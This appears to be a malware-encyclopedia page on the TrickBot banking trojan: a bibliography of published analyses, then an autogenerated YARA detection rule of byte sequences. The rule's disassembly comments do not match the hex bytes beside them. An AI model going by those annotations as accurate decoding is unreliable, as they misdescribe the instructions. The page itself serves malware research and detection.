@online{sneakymonkey:20191029:trickbot:bd7249c, author = {SneakyMonkey}, title = {{TRICKBOT - Analysis Part II}}, date = {2019-10-29}, organization = {SneakyMonkey Blog}, url = {https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/}, language = {English}, urldate = {2019-12-17} } TRICKBOT - Analysis Part II
TrickBot
2019-09-25 | GovCERT.ch | GovCERT.ch
@online{govcertch:20190925:trickbot:8346dd7, author = {GovCERT.ch}, title = {{Trickbot - An analysis of data collected from the botnet}}, date = {2019-09-25}, organization = {GovCERT.ch}, url = {https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet}, language = {English}, urldate = {2020-01-08} } Trickbot - An analysis of data collected from the botnet
TrickBot
2019-08-27 | Secureworks | CTU Research Team
@online{team:20190827:trickbot:fa5f95b, author = {CTU Research Team}, title = {{TrickBot Modifications Target U.S. Mobile Users}}, date = {2019-08-27}, organization = {Secureworks}, url = {https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users}, language = {English}, urldate = {2020-01-09} } TrickBot Modifications Target U.S. Mobile Users
TrickBot
2019-08-26 | InQuest | Josiah Smith
@online{smith:20190826:memory:c4cea9b, author = {Josiah Smith}, title = {{Memory Analysis of TrickBot}}, date = {2019-08-26}, organization = {InQuest}, url = {https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis}, language = {English}, urldate = {2020-01-10} } Memory Analysis of TrickBot
TrickBot
2019-08-05 | Trend Micro | Noel Anthony Llimos, Michael Jhon Ofiaza
@online{llimos:20190805:latest:62ba94b, author = {Noel Anthony Llimos and Michael Jhon Ofiaza}, title = {{Latest Trickbot Campaign Delivered via Highly Obfuscated JS File}}, date = {2019-08-05}, organization = {Trend Micro}, url = {https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/}, language = {English}, urldate = {2020-01-23} } Latest Trickbot Campaign Delivered via Highly Obfuscated JS File
ostap TrickBot
2019-07-11 | NTT Security | NTT Security
@online{security:20190711:targeted:a48e692, author = {NTT Security}, title = {{Targeted TrickBot activity drops 'PowerBrace' backdoor}}, date = {2019-07-11}, organization = {NTT Security}, url = {https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor}, language = {English}, urldate = {2019-12-18} } Targeted TrickBot activity drops 'PowerBrace' backdoor
PowerBrace TrickBot
2019-06-04 | SlideShare | Vitali Kremez
@online{kremez:20190604:inside:d633c6f, author = {Vitali Kremez}, title = {{Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vitali Kremez}}, date = {2019-06-04}, organization = {SlideShare}, url = {https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez}, language = {English}, urldate = {2020-01-13} } Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vitali Kremez
TrickBot
2019-05-22 | (no organization given) | sneakymonk3y (Mark)
@online{mark:20190522:trickbot:277256b, author = {sneakymonk3y (Mark)}, title = {{TRICKBOT - Analysis}}, date = {2019-05-22}, url = {https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/}, language = {English}, urldate = {2020-01-06} } TRICKBOT - Analysis
TrickBot
2019-05-09 | GovCERT.ch | GovCERT.ch
@online{govcertch:20190509:severe:2767782, author = {GovCERT.ch}, title = {{Severe Ransomware Attacks Against Swiss SMEs}}, date = {2019-05-09}, organization = {GovCERT.ch}, url = {https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes}, language = {English}, urldate = {2019-07-11} } Severe Ransomware Attacks Against Swiss SMEs
Emotet LockerGoga Ryuk TrickBot
2019-05-02 | CERT.PL | Michał Praszmo
@online{praszmo:20190502:detricking:43a7dc1, author = {Michał Praszmo}, title = {{Detricking TrickBot Loader}}, date = {2019-05-02}, organization = {CERT.PL}, url = {https://www.cert.pl/en/news/single/detricking-trickbot-loader/}, language = {English}, urldate = {2020-01-08} } Detricking TrickBot Loader
TrickBot
2019-04-05 | Medium vishal_thakur | Vishal Thakur
@online{thakur:20190405:trickbot:d1c4891, author = {Vishal Thakur}, title = {{Trickbot — a concise treatise}}, date = {2019-04-05}, organization = {Medium vishal_thakur}, url = {https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737}, language = {English}, urldate = {2020-01-13} } Trickbot — a concise treatise
TrickBot
2019-04-02 | Cybereason | Noa Pinkas, Lior Rochberger, Matan Zatz
@online{pinkas:20190402:triple:10a3e37, author = {Noa Pinkas and Lior Rochberger and Matan Zatz}, title = {{Triple Threat: Emotet Deploys Trickbot to Steal Data & Spread Ryuk}}, date = {2019-04-02}, organization = {Cybereason}, url = {https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware}, language = {English}, urldate = {2020-01-09} } Triple Threat: Emotet Deploys Trickbot to Steal Data & Spread Ryuk
Ryuk TrickBot
2019-03-05 | PepperMalware Blog | Pepper Potts
@online{potts:20190305:quick:773aabc, author = {Pepper Potts}, title = {{Quick Analysis of a Trickbot Sample with NSA's Ghidra SRE Framework}}, date = {2019-03-05}, organization = {PepperMalware Blog}, url = {http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html}, language = {English}, urldate = {2019-12-19} } Quick Analysis of a Trickbot Sample with NSA's Ghidra SRE Framework
TrickBot
2019-02-15 | CrowdStrike | Brendon Feeley, Bex Hartley
@online{feeley:20190215:sinful:729f693, author = {Brendon Feeley and Bex Hartley}, title = {{“Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web}}, date = {2019-02-15}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/}, language = {English}, urldate = {2019-12-20} } “Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web
Dyre IcedID TrickBot Vawtrak Lunar Spider WIZARD SPIDER
2019-02-12 | Trend Micro | Trend Micro
@online{micro:20190212:trickbot:73576ba, author = {Trend Micro}, title = {{Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire}}, date = {2019-02-12}, organization = {Trend Micro}, url = {https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/}, language = {English}, urldate = {2020-01-12} } Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire
TrickBot
2019-01-11 | FireEye | Kimberly Goody, Jeremy Kennelly, Jaideep Natu, Christopher Glyer
@online{goody:20190111:nasty:3c872d4, author = {Kimberly Goody and Jeremy Kennelly and Jaideep Natu and Christopher Glyer}, title = {{A Nasty Trick: From Credential Theft Malware to Business Disruption}}, date = {2019-01-11}, organization = {FireEye}, url = {https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html}, language = {English}, urldate = {2019-12-20} } A Nasty Trick: From Credential Theft Malware to Business Disruption
Ryuk TrickBot GRIM SPIDER WIZARD SPIDER
2018-12-12 SecureData Wicus Ross
@online{ross:20181212:trickbot:7a0e2a6, author = {Wicus Ross}, title = {{The TrickBot and MikroTik connection}}, date = {2018-12-12}, organization = {SecureData}, url = {https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/}, language = {English}, urldate = {2020-05-18} } The TrickBot and MikroTik connection
TrickBot
2018-12-05 VIPRE VIPRE Labs
@online{labs:20181205:trickbots:b45d588, author = {VIPRE Labs}, title = {{Trickbot’s Tricks}}, date = {2018-12-05}, organization = {VIPRE}, url = {https://labs.vipre.com/trickbots-tricks/}, language = {English}, urldate = {2020-01-09} } Trickbot’s Tricks
TrickBot
2018-11-12 Malwarebytes hasherezade
@online{hasherezade:20181112:whats:e44d5f3, author = {hasherezade}, title = {{What’s new in TrickBot? Deobfuscating elements}}, date = {2018-11-12}, organization = {Malwarebytes}, url = {https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/}, language = {English}, urldate = {2019-12-20} } What’s new in TrickBot? Deobfuscating elements
TrickBot
2018-11-08 Fortinet Xiaopeng Zhang
@online{zhang:20181108:deep:fca360c, author = {Xiaopeng Zhang}, title = {{Deep Analysis of TrickBot New Module pwgrab}}, date = {2018-11-08}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html}, language = {English}, urldate = {2019-11-17} } Deep Analysis of TrickBot New Module pwgrab
TrickBot
2018-11-01 Trend Micro Noel Anthony Llimos, Carl Maverick Pascual
@online{llimos:20181101:trickbot:7d0ea94, author = {Noel Anthony Llimos and Carl Maverick Pascual}, title = {{Trickbot Shows Off New Trick: Password Grabber Module}}, date = {2018-11-01}, organization = {Trend Micro}, url = {https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module}, language = {English}, urldate = {2020-01-06} } Trickbot Shows Off New Trick: Password Grabber Module
TrickBot
2018-08-14 Cyberbit Hod Gavriel
@online{gavriel:20180814:latest:7df6364, author = {Hod Gavriel}, title = {{Latest Trickbot Variant has New Tricks Up Its Sleeve}}, date = {2018-08-14}, organization = {Cyberbit}, url = {https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/}, language = {English}, urldate = {2019-11-26} } Latest Trickbot Variant has New Tricks Up Its Sleeve
TrickBot
2018-07-03 Talos Intelligence Ben Baker, Holger Unterbrink
@online{baker:20180703:smoking:067be1f, author = {Ben Baker and Holger Unterbrink}, title = {{Smoking Guns - Smoke Loader learned new tricks}}, date = {2018-07-03}, organization = {Talos Intelligence}, url = {https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html}, language = {English}, urldate = {2019-10-14} } Smoking Guns - Smoke Loader learned new tricks
SmokeLoader TrickBot
2018-06-20 OALabs
@online{oalabs:20180620:unpacking:e4d59a4, author = {OALabs}, title = {{Unpacking and Extracting TrickBot Malware Configuration With x64dbg and Python}}, date = {2018-06-20}, url = {https://www.youtube.com/watch?v=EdchPEHnohw}, language = {English}, urldate = {2019-12-24} } Unpacking and Extracting TrickBot Malware Configuration With x64dbg and Python
TrickBot
2018-06-13 Github (JR0driguezB) Jorge Rodriguez
@online{rodriguez:20180613:trickbot:e004ae8, author = {Jorge Rodriguez}, title = {{TrickBot config files}}, date = {2018-06-13}, organization = {Github (JR0driguezB)}, url = {https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot}, language = {English}, urldate = {2019-07-11} } TrickBot config files
TrickBot
2018-04-16 Random RE sysopfb
@online{sysopfb:20180416:trickbot:5305f46, author = {sysopfb}, title = {{TrickBot & UACME}}, date = {2018-04-16}, organization = {Random RE}, url = {https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html}, language = {English}, urldate = {2020-01-09} } TrickBot & UACME
TrickBot
2018-04-03 Vitali Kremez Blog Vitali Kremez
@online{kremez:20180403:lets:b45dd50, author = {Vitali Kremez}, title = {{Let's Learn: Trickbot Implements Network Collector Module Leveraging CMD, WMI & LDAP}}, date = {2018-04-03}, organization = {Vitali Kremez Blog}, url = {http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html}, language = {English}, urldate = {2019-07-27} } Let's Learn: Trickbot Implements Network Collector Module Leveraging CMD, WMI & LDAP
TrickBot
2018-03-31 Youtube (hasherezade) hasherezade
@online{hasherezade:20180331:deobfuscating:39c1be0, author = {hasherezade}, title = {{Deobfuscating TrickBot's strings with libPeConv}}, date = {2018-03-31}, organization = {Youtube (hasherezade)}, url = {https://www.youtube.com/watch?v=KMcSAlS9zGE}, language = {English}, urldate = {2020-01-13} } Deobfuscating TrickBot's strings with libPeConv
TrickBot
2018-03-27 Trend Micro Trendmicro
@online{trendmicro:20180327:evolving:faa2e54, author = {Trendmicro}, title = {{Evolving Trickbot Adds Detection Evasion and Screen-Locking Features}}, date = {2018-03-27}, organization = {Trend Micro}, url = {https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features}, language = {English}, urldate = {2020-01-07} } Evolving Trickbot Adds Detection Evasion and Screen-Locking Features
TrickBot
2018-03-21 Webroot Jason Davison
@online{davison:20180321:trickbot:1f0576e, author = {Jason Davison}, title = {{TrickBot Banking Trojan Adapts with New Module}}, date = {2018-03-21}, organization = {Webroot}, url = {https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/}, language = {English}, urldate = {2020-01-13} } TrickBot Banking Trojan Adapts with New Module
TrickBot
2018-02-15 SecurityIntelligence Ophir Harpaz, Magal Baz, Limor Kessem
@online{harpaz:20180215:trickbots:2cf1b53, author = {Ophir Harpaz and Magal Baz and Limor Kessem}, title = {{TrickBot’s Cryptocurrency Hunger: Tricking the Bitcoin Out of Wallets}}, date = {2018-02-15}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/}, language = {English}, urldate = {2020-01-06} } TrickBot’s Cryptocurrency Hunger: Tricking the Bitcoin Out of Wallets
TrickBot
2018-02-01 Malware Traffic Analysis Brad Duncan
@online{duncan:20180201:quick:320f855, author = {Brad Duncan}, title = {{Quick Test Drive of Trickbot (It now has a Monero Module)}}, date = {2018-02-01}, organization = {Malware Traffic Analysis}, url = {http://www.malware-traffic-analysis.net/2018/02/01/}, language = {English}, urldate = {2019-07-09} } Quick Test Drive of Trickbot (It now has a Monero Module)
TrickBot
2017-12-30 Youtube (hasherezade) hasherezade
@online{hasherezade:20171230:unpacking:5477bb2, author = {hasherezade}, title = {{Unpacking TrickBot with PE-sieve}}, date = {2017-12-30}, organization = {Youtube (hasherezade)}, url = {https://www.youtube.com/watch?v=lTywPmZEU1A}, language = {English}, urldate = {2020-01-06} } Unpacking TrickBot with PE-sieve
TrickBot
2017-12-19 Vitali Kremez Blog Vitali Kremez
@online{kremez:20171219:lets:030e09a, author = {Vitali Kremez}, title = {{Let's Learn: Introducing New Trickbot LDAP "DomainGrabber" Module}}, date = {2017-12-19}, organization = {Vitali Kremez Blog}, url = {http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html}, language = {English}, urldate = {2019-11-23} } Let's Learn: Introducing New Trickbot LDAP "DomainGrabber" Module
TrickBot
2017-11-22 Flashpoint Vitali Kremez
@online{kremez:20171122:trickbot:faea11e, author = {Vitali Kremez}, title = {{Trickbot Gang Evolves, Incorporates Account Checking Into Hybrid Attack Model}}, date = {2017-11-22}, organization = {Flashpoint}, url = {https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/}, language = {English}, urldate = {2019-12-10} } Trickbot Gang Evolves, Incorporates Account Checking Into Hybrid Attack Model
TrickBot
2017-11-21 Vitali Kremez
@online{kremez:20171121:lets:5fb17b0, author = {Vitali Kremez}, title = {{Let's Learn: Trickbot Socks5 Backconnect Module In Detail}}, date = {2017-11-21}, url = {http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html}, language = {English}, urldate = {2019-11-22} } Let's Learn: Trickbot Socks5 Backconnect Module In Detail
TrickBot
2017-10-06 Blueliv Blueliv
@online{blueliv:20171006:trickbot:a2a9ac8, author = {Blueliv}, title = {{TrickBot banking trojan using EFLAGS as an anti-hook technique}}, date = {2017-10-06}, organization = {Blueliv}, url = {https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/}, language = {English}, urldate = {2020-01-08} } TrickBot banking trojan using EFLAGS as an anti-hook technique
TrickBot
2017-08-01 Malwarebytes Malwarebytes Labs
@online{labs:20170801:trickbot:222d8bc, author = {Malwarebytes Labs}, title = {{TrickBot comes up with new tricks: attacking Outlook and browsing data}}, date = {2017-08-01}, organization = {Malwarebytes}, url = {https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/}, language = {English}, urldate = {2019-12-20} } TrickBot comes up with new tricks: attacking Outlook and browsing data
TrickBot
2017-07-27 Flashpoint Flashpoint
@online{flashpoint:20170727:new:bb5c883, author = {Flashpoint}, title = {{New Version of “Trickbot” Adds Worm Propagation Module}}, date = {2017-07-27}, organization = {Flashpoint}, url = {https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/}, language = {English}, urldate = {2020-01-13} } New Version of “Trickbot” Adds Worm Propagation Module
TrickBot
2017-07 Ring Zero Labs Ring Zero Labs
@online{labs:201707:trickbot:e738eaf, author = {Ring Zero Labs}, title = {{TrickBot Banking Trojan - DOC00039217.doc}}, date = {2017-07}, organization = {Ring Zero Labs}, url = {https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html}, language = {English}, urldate = {2020-01-10} } TrickBot Banking Trojan - DOC00039217.doc
TrickBot
2017-06-15 F5 Sara Boddy, Jesse Smith, Doron Voolf
@online{boddy:20170615:trickbot:6eb1db4, author = {Sara Boddy and Jesse Smith and Doron Voolf}, title = {{Trickbot Expands Global Targets Beyond Banks and Payment Processors to CRMs}}, date = {2017-06-15}, organization = {F5}, url = {https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms}, language = {English}, urldate = {2019-12-24} } Trickbot Expands Global Targets Beyond Banks and Payment Processors to CRMs
TrickBot
2017-06-12 Security Art Work Marc Salinas, José Miguel Holguín
@techreport{salinas:20170612:evolucin:9930231, author = {Marc Salinas and José Miguel Holguín}, title = {{Evolución de Trickbot}}, date = {2017-06-12}, institution = {Security Art Work}, url = {https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf}, language = {Spanish}, urldate = {2020-01-10} } Evolución de Trickbot
TrickBot
2017-05-26 PWC Bart Parys
@online{parys:20170526:trickbots:c1b84e1, author = {Bart Parys}, title = {{TrickBot’s bag of tricks}}, date = {2017-05-26}, organization = {PWC}, url = {http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html}, language = {English}, urldate = {2020-06-18} } TrickBot’s bag of tricks
TrickBot
2017-03-01 FraudWatch International FraudWatch International
@online{international:20170301:how:fb75ef9, author = {FraudWatch International}, title = {{How Does the Trickbot Malware Work?}}, date = {2017-03-01}, organization = {FraudWatch International}, url = {https://blog.fraudwatchinternational.com/malware/trickbot-malware-works}, language = {English}, urldate = {2020-01-08} } How Does the Trickbot Malware Work?
TrickBot
2016-12-07 Botconf Joshua Adams
@techreport{adams:20161207:trickbot:fc3427c, author = {Joshua Adams}, title = {{The TrickBot Evolution}}, date = {2016-12-07}, institution = {Botconf}, url = {https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf}, language = {English}, urldate = {2020-01-09} } The TrickBot Evolution
TrickBot
2016-12-06 Fortinet Xiaopeng Zhang
@online{zhang:20161206:deep:1f1521f, author = {Xiaopeng Zhang}, title = {{Deep Analysis of the Online Banking Botnet TrickBot}}, date = {2016-12-06}, organization = {Fortinet}, url = {http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot}, language = {English}, urldate = {2020-01-08} } Deep Analysis of the Online Banking Botnet TrickBot
TrickBot
2016-11-09 Lior Keshet
@online{keshet:20161109:tricks:c3ab510, author = {Lior Keshet}, title = {{Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations}}, date = {2016-11-09}, url = {https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/}, language = {English}, urldate = {2019-10-17} } Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations
TrickBot
2016-11-07 F5 Labs Julia Karpin, Shaul Vilkomir-Preisman, Anna Dorfman
@online{karpin:20161107:little:598f939, author = {Julia Karpin and Shaul Vilkomir-Preisman and Anna Dorfman}, title = {{Little Trickbot Growing Up: New Campaign}}, date = {2016-11-07}, organization = {F5 Labs}, url = {https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412}, language = {English}, urldate = {2020-01-06} } Little Trickbot Growing Up: New Campaign
TrickBot
2016-10-25 NetScout ASERT Team
@online{team:20161025:trickbot:dd465d9, author = {ASERT Team}, title = {{TrickBot Banker Insights}}, date = {2016-10-25}, organization = {NetScout}, url = {https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/}, language = {English}, urldate = {2019-07-11} } TrickBot Banker Insights
TrickBot
2016-10-24 Malwarebytes Malwarebytes Labs
@online{labs:20161024:introducing:e59ac27, author = {Malwarebytes Labs}, title = {{Introducing TrickBot, Dyreza’s successor}}, date = {2016-10-24}, organization = {Malwarebytes}, url = {https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/}, language = {English}, urldate = {2019-12-20} } Introducing TrickBot, Dyreza’s successor
TrickBot
2016-10-15 Fidelis Cybersecurity Threat Research Team
@online{team:20161015:trickbot:cc9f48f, author = {Threat Research Team}, title = {{TrickBot: We Missed you, Dyre}}, date = {2016-10-15}, organization = {Fidelis Cybersecurity}, url = {https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre}, language = {English}, urldate = {2019-11-28} } TrickBot: We Missed you, Dyre
TrickBot
Yara Rules
[TLP:WHITE] win_trickbot_auto (20200529 | autogenerated rule brought to you by yara-signator)
rule win_trickbot_auto {

    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2020-05-30"
        version = "1"
        description = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.4.0"
        tool_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot"
        malpedia_rule_date = "20200529"
        malpedia_hash = "92c362319514e5a6da26204961446caa3a8b32a8"
        malpedia_version = "20200529"
        malpedia_license = "CC BY-NC-SA 4.0"
        malpedia_sharing = "TLP:WHITE"

    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using yara-signator.
     * The code and documentation / approach is published here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */


    strings:
        $sequence_0 = { 83c010 eb25 a900000040 7411 2500000080 f7d8 }
            // n = 6, score = 4500
            //   83c010               | mov                 edx, dword ptr [ecx + 0x18]
            //   eb25                 | dec                 eax
            //   a900000040           | mov                 ecx, dword ptr [ecx + 0x10]
            //   7411                 | call                eax
            //   2500000080           | dec                 eax
            //   f7d8                 | mov                 eax, dword ptr [ecx + 0x38]

        $sequence_1 = { 83e020 83c020 eb36 2500000080 f7d8 1bc0 }
            // n = 6, score = 4500
            //   83e020               | dec                 esp
            //   83c020               | mov                 eax, dword ptr [ecx + 0x20]
            //   eb36                 | dec                 eax
            //   2500000080           | mov                 edx, dword ptr [ecx + 0x18]
            //   f7d8                 | dec                 eax
            //   1bc0                 | mov                 dword ptr [esp + 0x40], eax

        $sequence_2 = { f7d8 1bc0 83e002 83c002 eb0d }
            // n = 5, score = 4500
            //   f7d8                 | dec                 esp
            //   1bc0                 | mov                 eax, dword ptr [ecx + 0x20]
            //   83e002               | dec                 eax
            //   83c002               | mov                 edx, dword ptr [ecx + 0x18]
            //   eb0d                 | dec                 eax

        $sequence_3 = { 83e002 83c002 eb0d 2500000080 f7d8 1bc0 83e007 }
            // n = 7, score = 4500
            //   83e002               | mov                 ecx, dword ptr [ecx + 0x10]
            //   83c002               | dec                 eax
            //   eb0d                 | mov                 dword ptr [esp + 0x20], eax
            //   2500000080           | inc                 ecx
            //   f7d8                 | call                edx
            //   1bc0                 | dec                 eax
            //   83e007               | mov                 eax, dword ptr [ecx + 0x40]

        $sequence_4 = { f7d8 1bc0 83e070 83c010 eb25 }
            // n = 5, score = 4500
            //   f7d8                 | dec                 eax
            //   1bc0                 | mov                 dword ptr [esp + 0x28], eax
            //   83e070               | dec                 eax
            //   83c010               | mov                 eax, dword ptr [ecx + 0x30]
            //   eb25                 | dec                 eax

        $sequence_5 = { a900000020 7429 a900000040 7411 }
            // n = 4, score = 4500
            //   a900000020           | dec                 esp
            //   7429                 | mov                 ecx, dword ptr [ecx + 0x28]
            //   a900000040           | dec                 esp
            //   7411                 | mov                 eax, dword ptr [ecx + 0x20]

        $sequence_6 = { 7411 2500000080 f7d8 1bc0 83e020 83c020 eb36 }
            // n = 7, score = 4500
            //   7411                 | call                eax
            //   2500000080           | dec                 esp
            //   f7d8                 | mov                 ecx, dword ptr [ecx + 0x28]
            //   1bc0                 | dec                 esp
            //   83e020               | mov                 eax, dword ptr [ecx + 0x20]
            //   83c020               | dec                 eax
            //   eb36                 | mov                 edx, dword ptr [ecx + 0x18]

        $sequence_7 = { 83c724 8b07 a900000020 7429 }
            // n = 4, score = 3700
            //   83c724               | dec                 eax
            //   8b07                 | mov                 eax, dword ptr [ecx + 0x48]
            //   a900000020           | dec                 eax
            //   7429                 | mov                 dword ptr [esp + 0x38], eax

        $sequence_8 = { ff15???????? 8b45f8 3bc3 7407 50 }
            // n = 5, score = 3400
            //   ff15????????         |                     
            //   8b45f8               | mov                 ecx, dword ptr [ecx + 0x10]
            //   3bc3                 | dec                 eax
            //   7407                 | mov                 dword ptr [esp + 0x20], eax
            //   50                   | dec                 eax

        $sequence_9 = { 6a00 50 ffd2 8b45fc 8b08 8b9118010000 }
            // n = 6, score = 3300
            //   6a00                 | dec                 esp
            //   50                   | mov                 ecx, dword ptr [ecx + 0x28]
            //   ffd2                 | dec                 esp
            //   8b45fc               | mov                 eax, dword ptr [ecx + 0x20]
            //   8b08                 | dec                 eax
            //   8b9118010000         | mov                 edx, dword ptr [ecx + 0x18]

        $sequence_10 = { 8b08 8b9118010000 6a00 50 ffd2 }
            // n = 5, score = 3300
            //   8b08                 | dec                 eax
            //   8b9118010000         | mov                 dword ptr [esp + 0x38], eax
            //   6a00                 | dec                 eax
            //   50                   | mov                 eax, dword ptr [ecx + 0x40]
            //   ffd2                 | dec                 eax

        $sequence_11 = { 740b 83c102 48 75f5 }
            // n = 4, score = 3300
            //   740b                 | dec                 esp
            //   83c102               | mov                 eax, dword ptr [ecx + 0x20]
            //   48                   | dec                 eax
            //   75f5                 | mov                 edx, dword ptr [ecx + 0x18]

        $sequence_12 = { 8d55f8 52 50 8b81a4000000 ffd0 85c0 }
            // n = 6, score = 3300
            //   8d55f8               | mov                 dword ptr [esp + 0x30], eax
            //   52                   | dec                 eax
            //   50                   | mov                 dword ptr [esp + 0x38], eax
            //   8b81a4000000         | dec                 eax
            //   ffd0                 | mov                 eax, dword ptr [ecx + 0x40]
            //   85c0                 | dec                 eax

        $sequence_13 = { 8b45fc 8b08 8b9110010000 6a00 }
            // n = 4, score = 3300
            //   8b45fc               | mov                 edx, dword ptr [ecx + 0x18]
            //   8b08                 | dec                 eax
            //   8b9110010000         | mov                 ecx, dword ptr [ecx + 0x10]
            //   6a00                 | call                eax

        $sequence_14 = { 8b08 8d55f0 52 50 8b81b4000000 ffd0 }
            // n = 6, score = 3300
            //   8b08                 | mov                 dword ptr [esp + 0x30], eax
            //   8d55f0               | dec                 eax
            //   52                   | mov                 eax, dword ptr [ecx + 0x38]
            //   50                   | dec                 eax
            //   8b81b4000000         | mov                 eax, dword ptr [ecx + 0x50]
            //   ffd0                 | dec                 esp

        $sequence_15 = { 4c8b11 4c8b4928 4c8b4120 488b5118 4889442438 }
            // n = 5, score = 2800
            //   4c8b11               | dec                 eax
            //   4c8b4928             | mov                 dword ptr [esp + 0x30], eax
            //   4c8b4120             | dec                 eax
            //   488b5118             | mov                 eax, dword ptr [ecx + 0x38]
            //   4889442438           | dec                 eax

        $sequence_16 = { 488b4130 488b4910 4889442420 41ffd2 }
            // n = 4, score = 2800
            //   488b4130             | dec                 eax
            //   488b4910             | mov                 edx, dword ptr [ecx + 0x18]
            //   4889442420           | dec                 eax
            //   41ffd2               | mov                 dword ptr [esp + 0x38], eax

        $sequence_17 = { 4c8b4120 488b5118 4889442440 488b4148 4889442438 488b4140 }
            // n = 6, score = 2800
            //   4c8b4120             | mov                 eax, dword ptr [ecx + 0x20]
            //   488b5118             | dec                 eax
            //   4889442440           | mov                 edx, dword ptr [ecx + 0x18]
            //   488b4148             | dec                 eax
            //   4889442438           | mov                 dword ptr [esp + 0x38], eax
            //   488b4140             | dec                 eax

        $sequence_18 = { 488b4140 4889442430 488b4138 4889442428 488b4130 }
            // n = 5, score = 2800
            //   488b4140             | dec                 eax
            //   4889442430           | mov                 eax, dword ptr [ecx + 0x40]
            //   488b4138             | dec                 eax
            //   4889442428           | mov                 dword ptr [esp + 0x30], eax
            //   488b4130             | dec                 eax

        $sequence_19 = { 33db 53 53 6a03 53 6a01 6800010000 }
            // n = 7, score = 2800
            //   33db                 | sbb                 eax, eax
            //   53                   | and                 eax, 0x20
            //   53                   | add                 eax, 0x20
            //   6a03                 | jmp                 0x3b
            //   53                   | and                 eax, 0x80000000
            //   6a01                 | neg                 eax
            //   6800010000           | sbb                 eax, eax

        $sequence_20 = { 50 ff15???????? 8b4604 85c0 7407 50 ff15???????? }
            // n = 7, score = 2800
            //   50                   | sbb                 eax, eax
            //   ff15????????         |                     
            //   8b4604               | and                 eax, 7
            //   85c0                 | inc                 eax
            //   7407                 | test                eax, 0x20000000
            //   50                   | je                  0x3d
            //   ff15????????         |                     

        $sequence_21 = { 488b5118 4889442438 488b4140 4889442430 }
            // n = 4, score = 2800
            //   488b5118             | dec                 eax
            //   4889442438           | mov                 edx, dword ptr [ecx + 0x18]
            //   488b4140             | dec                 eax
